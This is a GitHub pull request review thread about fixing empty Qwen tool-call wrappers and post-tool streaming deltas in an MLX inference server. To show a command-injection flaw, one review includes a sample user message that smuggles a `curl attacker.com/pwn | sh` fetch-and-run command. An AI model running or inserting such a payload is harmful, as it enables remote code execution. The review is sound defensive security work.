fix: Qwen tool streaming recovery#497
Conversation
|
Stack:
I ran into a scenario where asking the model to run a bash command (list the files in this folder) while streaming resulted in a corrupted output. This PR addresses that. I've attempted to follow your guide for contributing. Please let me know if there is anything missing. |
janhilgard
left a comment
There was a problem hiding this comment.
Thanks for the contribution and for following the guide! I understand the frustration with empty `<tool_call></>` wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:
Critical: Server-side tool call synthesis is fundamentally wrong
The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.
Security: Command injection
The synthesis logic extracts paths from user text via regex and inserts them into shell commands:
args["command"] = f"ls -la {_shell_quote_path(target)}"A malicious (or just unlucky) user message like:
list files in ~/'; curl attacker.com/pwn | sh; echo '
…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The _shell_quote_path function won't catch all edge cases (it never can when the server is fabricating shell commands).
Architectural: Hallucinating on behalf of the model
If the model emits an empty <tool_call></tool_call>, the correct responses are:
- Return any text before the marker as content
- Log a warning about malformed tool output
- Let the client/agent framework decide what to do (retry, fallback, etc.)
The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching "list|show|ls|dir" in the user message. This breaks:
- Deterministic reproducibility (same generation → different behavior depending on user text)
- Client trust (tool calls are no longer reliably from the model)
- Audit trails (who called the tool — the model or the server?)
Streaming deferral is too broad
The defer_content_until_finish flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.
What to do instead
The real fix is much simpler:
- When the parser encounters
<tool_call></>or<tool_call></tool_call>with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation. - Optionally strip the empty XML wrapper from the returned content.
- Log a warning:
logger.warning("Model emitted empty tool_call wrapper, treating as content")
The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.
Minor: Good parts
- Hoisting
request.model_dump()intorequest_dictonce (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change. - The
try/except TypeErrorfallback for therequest=kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).
tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.
7138147 to
ce33946
Compare
Thanks for the thorough review, a lot of good points here. A bunch of this actually overlaps with an update I already had in flight, so I've folded your feedback into the update. Really appreciate the eye on it. |
|
Took a look at the revised version. The wrapper handling and the In if response.finish_reason == "stop":
new_text = ""
else:
detok = self._get_detokenizer(request_id)
detok.add_token(response.token)
new_text = detok.last_segment
output_text = detok.text
output = RequestOutput(
...
new_text=new_text,
output_text=output_text if response.finish_reason != "stop" else "",
...
)This only works because Python's ternary is lazy. Cleaner to bind both branches: if response.finish_reason == "stop":
new_text = ""
output_text = ""
else:
detok = self._get_detokenizer(request_id)
detok.add_token(response.token)
new_text = detok.last_segment
output_text = detok.text
output = RequestOutput(
...
new_text=new_text,
output_text=output_text,
...
)In if post_tool_stream:
full_text = getattr(output, "text", "") or ""
if full_text.startswith(decoded_text_seen):
delta_text = full_text[len(decoded_text_seen):]
decoded_text_seen = full_text
elif full_text:
delta_text = full_text
decoded_text_seen = full_textGuarding the whole block on if post_tool_stream:
full_text = getattr(output, "text", "") or ""
if full_text:
if full_text.startswith(decoded_text_seen):
delta_text = full_text[len(decoded_text_seen):]
else:
delta_text = full_text
decoded_text_seen = full_text |
waybarrios
left a comment
There was a problem hiding this comment.
Please check my previous comment
janhilgard
left a comment
There was a problem hiding this comment.
The revised commit addresses the security and architectural concerns from my first review — the server no longer fabricates tool calls, empty XML wrappers are correctly treated as malformed generation with a warning. The request_dict hoist and try/except TypeError compatibility shim are clean additions. Test coverage is good.
However, waybarrios's two code issues from May 14 are still outstanding and need to be fixed before this can merge:
1. Unbound output_text in scheduler.py
In _process_batch_responses, output_text is only assigned in the else branch:
if response.finish_reason == "stop":
new_text = ""
# output_text not assigned here
else:
...
output_text = detok.text
output = RequestOutput(
...
output_text=output_text if response.finish_reason != "stop" else "",
)This works today because Python's ternary is lazy — when finish_reason == "stop", the left operand is never evaluated. But it's fragile: any refactor that changes the ternary condition or evaluation order will produce UnboundLocalError. Please bind both branches:
if response.finish_reason == "stop":
new_text = ""
output_text = ""
else:
detok = self._get_detokenizer(request_id)
detok.add_token(response.token)
new_text = detok.last_segment
output_text = detok.text2. Empty full_text drops new_text in server.py
The post_tool_stream block runs unconditionally:
if post_tool_stream:
full_text = getattr(output, "text", "") or ""
if full_text.startswith(decoded_text_seen):
delta_text = full_text[len(decoded_text_seen):]
decoded_text_seen = full_textWhen the engine yields a chunk without cumulative text (or text is empty), full_text = "". Since "".startswith("") is True, delta_text gets overwritten with "", silently dropping whatever valid content output.new_text provided. Guard the whole block on full_text:
if post_tool_stream:
full_text = getattr(output, "text", "") or ""
if full_text:
if full_text.startswith(decoded_text_seen):
delta_text = full_text[len(decoded_text_seen):]
else:
delta_text = full_text
decoded_text_seen = full_text3. No CI
The branch has no CI checks. Please push to trigger CI and confirm tests pass (including the new test file).
Everything else — the _is_empty_tool_wrapper detection, the parser changes, the test coverage — looks correct.
2672ac4 to
802fb92
Compare
|
Follow-up on the May 14 / May 17 review thread: I rebased the branch onto current
Local verification on the rebased branch: uv run --with black black vllm_mlx/scheduler.py vllm_mlx/server.py vllm_mlx/tool_parsers/qwen3_xml_tool_parser.py tests/test_server.py tests/test_qwen3_xml_parser.py
uv run --with ruff ruff check vllm_mlx/scheduler.py vllm_mlx/server.py vllm_mlx/tool_parsers/qwen3_xml_tool_parser.py tests/test_server.py tests/test_qwen3_xml_parser.py --select E,F,W --ignore E402,E501,E731,F811,F841
uv run --with pytest pytest tests/test_qwen3_xml_parser.py tests/test_server.py tests/test_batching.pyResult: |
janhilgard
left a comment
There was a problem hiding this comment.
Code Review
1. Performance regression: full model_dump() instead of selective
# Before (selective):
tools_dict = (
request.model_dump(include={"tools"}).get("tools")
if request and request.tools
else None
)
# After (full dump):
request_dict = request.model_dump() if request is not None else {}model_dump() without include= serializes the entire request object (messages, tools, everything). With large contexts (60K+ tokens in messages), this can be slow and allocate significant memory on every request. The original code intentionally dumped only tools. Consider dumping only the fields you actually need:
request_dict = request.model_dump(include={"tools", "messages"}) if request is not None else {}Or even better, build the dict manually from just tools and a lightweight messages role check.
2. Post-tool cumulative text fix won't work on batched engine path
The post-tool streaming fix reads cumulative text via:
full_text = getattr(output, "text", "") or ""This works for GenerationOutput (simple engine) which has a text attribute. But the batched engine returns RequestOutput objects, where the cumulative text field is named output_text, not text. So getattr(output, "text", "") will always return "" for batched engine outputs, and the post-tool delta fix silently becomes a no-op.
The scheduler.py change adds output_text to non-finished chunks, but server.py never reads it. Either server.py should check both:
full_text = getattr(output, "text", "") or getattr(output, "output_text", "") or ""Or the attribute name should be unified.
3. Try/except TypeError for API compatibility is fragile
try:
tool_result = tool_parser.extract_tool_calls_streaming(
tool_previous, tool_accumulated_text, content,
request=request_dict,
)
except TypeError as exc:
if "unexpected keyword argument 'request'" not in str(exc):
raise
tool_result = tool_parser.extract_tool_calls_streaming(
tool_previous, tool_accumulated_text, content
)This pattern appears twice (two streaming paths). Catching TypeError and checking the exception message string is brittle — it depends on CPython's exact error wording, which could change across Python versions. A cleaner approach would be to check the parser's signature once at init time:
import inspect
_parser_accepts_request = "request" in inspect.signature(tool_parser.extract_tool_calls_streaming).parameters4. Tests only cover simple engine path
All test_server.py tests use FakeEngine yielding GenerationOutput (simple engine). None of them test the RequestOutput path (batched engine), which is the path used in production with --continuous-batching. This means the post-tool fix from point 2 above is untested on the production-relevant code path.
5. Minor: _is_empty_tool_wrapper regex
The </?> alternative (self-closing end tag without a name) is unusual — is this something Qwen actually emits? If so, a brief comment documenting the observed model output would help future readers.
Overall the PR addresses a real problem (empty tool wrapper synthesis, corrupt post-tool deltas), but the implementation has a few gaps — particularly the batched engine path not benefiting from the fix, and the performance cost of full model_dump().
janhilgard
left a comment
There was a problem hiding this comment.
Updated review (post-rebase, CI green)
waybarrios' two comments from May 14 are now addressed in the rebased commit 802fb92:
output_text = ""bound in both branches of thestopconditional ✅if full_text:guard prevents override when cumulative text is empty ✅
CI is all green (lint, type-check, tests across Python 3.10-3.13 + Apple Silicon). Single squashed commit.
Remaining concerns from my previous review
1. Full model_dump() — still present
This serializes the entire request on every streaming call. With 60K+ token conversations this allocates unnecessary memory. A targeted dump would be better:
request_dict = request.model_dump(include={"tools", "messages"}) if request is not None else {}Not a blocker, but worth noting for follow-up.
2. text vs output_text attribute mismatch — still present
The post-tool fix in server.py reads:
full_text = getattr(output, "text", "") or ""GenerationOutputhas.text→ works ✅RequestOutput(batched engine with--continuous-batching) has.output_text, not.text→getattrreturns""→ fix is silently a no-op on the production-relevant code path ❌
The scheduler.py change correctly populates output_text on non-finished RequestOutput objects, but server.py never reads it. Should be:
full_text = getattr(output, "text", "") or getattr(output, "output_text", "") or ""3. Try/except TypeError — still present
Not a blocker, but checking inspect.signature() once at init would be cleaner than catching TypeError twice per streaming loop.
Verdict
The empty-wrapper handling in qwen3_xml_tool_parser.py is solid and well-tested. The model_dump() and try/except patterns are minor style/perf issues. The text vs output_text mismatch (point 2) is the only functional gap — without it, the post-tool delta fix doesn't apply to batched engine users, which is the default production configuration.
If point 2 is addressed (one-line fix), this is ready to merge.
|
Follow-up on the remaining This keeps the change intentionally narrow:
I left the broader Local verification after the patch: uv run --with ruff ruff check vllm_mlx/server.py tests/test_server.py --select E,F,W --ignore E402,E501,E731,F811,F841
uv run --with black black --check vllm_mlx/server.py tests/test_server.py
uv run --with pytest pytest tests/test_qwen3_xml_parser.py tests/test_server.py tests/test_batching.pyResult: |
janhilgard
left a comment
There was a problem hiding this comment.
The text vs output_text mismatch from my previous review is now fixed in 689c77f:
full_text = (
getattr(output, "text", "")
or getattr(output, "output_text", "")
or ""
)New test test_stream_after_tool_message_uses_output_text_fallback covers the batched engine path using SimpleNamespace with output_text but no text.
Two minor items for follow-up (not blocking):
- Full
model_dump()could be narrowed toinclude={"tools", "messages"}to avoid serializing the entire request - The two
try/except TypeErrorshims could be replaced with a one-timeinspect.signature()check
Please squash the two commits before merge.
LGTM — approving.
689c77f to
9ae8452
Compare
|
Squashed the branch as requested. Current head is now a single commit: GitHub currently reports the branch as mergeable/clean. Waiting on @waybarrios for re-review when you have a chance. |
|
Thanks for the fix. A few speed and complexity items I would like to see addressed before this lands.
tools_dict = (
request.model_dump(include={"tools"}).get("tools")
if request and request.tools
else None
)The new code dumps the whole request including every message: request_dict = request.model_dump() if request is not None else {}
tools_dict = request_dict.get("tools") if request and request.tools else NoneThis walks the entire payload on every stream. The post_tool_stream = any(m.role == "tool" for m in (request.messages or []))The full dict for the tool parser can be computed lazily the first time markup appears.
try:
tool_result = tool_parser.extract_tool_calls_streaming(
tool_previous, tool_accumulated_text, content, request=request_dict,
)
except TypeError as exc:
if "unexpected keyword argument 'request'" not in str(exc):
raise
tool_result = tool_parser.extract_tool_calls_streaming(
tool_previous, tool_accumulated_text, content
)Two near-duplicates of this block, and exception construction sits in the per-chunk path. The final-pass call at
Since this touches the streaming hot path on three layers ( |
|
A few smaller things to round out the feedback, plus a request. The PR title and summary mention synthesizing a request-aware tool call, but the implementation suppresses empty wrappers rather than synthesizing anything. The behavior is correct, the title just describes a different intent. Worth updating before merge so the squash message matches what shipped. When the non-streaming The new test fixtures in Lastly, |
Summary
Tests
uv run ruff check vllm_mlx/ tests/ --select E,F,W --ignore E402,E501,E731,F811,F841uv run black --check vllm_mlx/ tests/uv run pytest tests/test_qwen3_xml_parser.py tests/test_server.pyNotes
uv run mypy vllm_mlx/ --ignore-missing-imports --no-error-summarystill reports the repository's existing broad type-check baseline; CI marks that job continue-on-error.uv run pre-commit run --all-filesalso fails on existing full-repo hook issues: old Ruff hook argument parsing, broad line-length findings, and the same Mypy baseline. The CI-equivalent Ruff and Black checks above pass.